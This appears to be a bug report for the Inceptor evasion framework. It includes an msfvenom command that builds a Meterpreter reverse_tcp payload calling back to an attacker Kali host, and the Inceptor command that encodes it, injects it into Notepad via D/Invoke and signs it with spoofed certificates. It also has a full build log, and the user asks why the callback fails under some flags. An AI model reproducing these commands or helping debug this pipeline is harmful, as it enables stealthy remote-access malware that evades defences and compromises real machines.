Describe the bug
I use a command containing "-m dinvoke" to compile the packaged exe, and this causes an exception in the injected Notepad.
To Reproduce
My OS is Windows 10 and my VS version is VS2022.
I use msfvenom to create the raw payload in Kali, with the command below:
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
The inceptor bypass command is "python donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15".
I then use the command "demo.bat xx.exe",
and the injection victim Notepad exits abnormally.
But if I remove the option -m dinvoke, then the final compiled exe can make the reverse connection to Kali successfully.
Or, if I remove the option -P, then the final compiled exe can also make the reverse connection to Kali successfully.
Expected behavior
Run "demo.bat xx.exe" and the final compiled payload can make the reverse connection to Kali.
Debug Info:
- Go to your config.ini file
- In DEBUG, mark all as 1
- Reproduce the bug again
- Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 1228
[>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
[>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
[>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see
[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe" /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe" "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447
[+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
[+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
[+] Signed with: CarbonCopy
[*] Phase 7: Finalising
[+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994
